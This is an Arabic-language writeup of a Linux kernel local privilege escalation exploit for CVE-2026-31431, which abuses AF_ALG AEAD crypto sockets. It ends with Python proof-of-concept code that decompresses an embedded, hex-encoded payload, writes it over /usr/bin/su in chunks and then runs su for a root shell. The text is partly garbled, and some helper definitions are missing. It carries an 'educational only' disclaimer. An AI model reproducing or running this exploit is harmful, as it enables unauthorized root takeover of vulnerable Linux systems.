
استغلال تصعيد الامتيازات المحلية لثغرة CVE-2026-31431، عبر إساءة استخدام معالجة مقبس AF_ALG AEAD للحصول على صلاحيات الجذر (root shell) على أنوية Linux المعرضة للخطر.
CVE-2026-31431 هي ثغرة تصعيد امتيازات في نظام Linux تستغل واجهة AF_ALG (واجهة برمجة تطبيقات التشفير في النواة). من خلال صياغة تفاعل خبيث مع مقابس AEAD (التشفير المصادق عليه مع البيانات المرتبطة)، يمكن للمهاجم تصعيد الامتيازات وتنفيذ كود بصلاحيات الجذر (root).
تستغل هذه الثغرة المعالجة غير السليمة لعمليات المقابس التشفيرية، مما يسمح بالتلاعب المتحكم به في الذاكرة وتصعيد الامتيازات في النهاية.
/usr/bin/su)الاستغلال:
ينشئ مقبس AF_ALG
يربط بـ:
authenc(hmac(sha256),cbc(aes))
يستخدم حمولات مصممة عبر setsockopt وsendmsg
يطلق سلوكًا غير مقصود في النواة
ينتقل إلى شل بصلاحيات الجذر عبر:
g.system("su")
المؤشرات الرئيسية:
socket(38,5,0) → AF_ALGzlib)
**إخلاء مسؤولية: أنا لا أملك هذا الإثبات (PoC). هو لأغراض تعليمية فقط للاختبار في البيئات التي يتوفر فيها الإذن. المؤلف/المالك لن يكون مسؤولاً عن أي إساءة استخدام. **
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")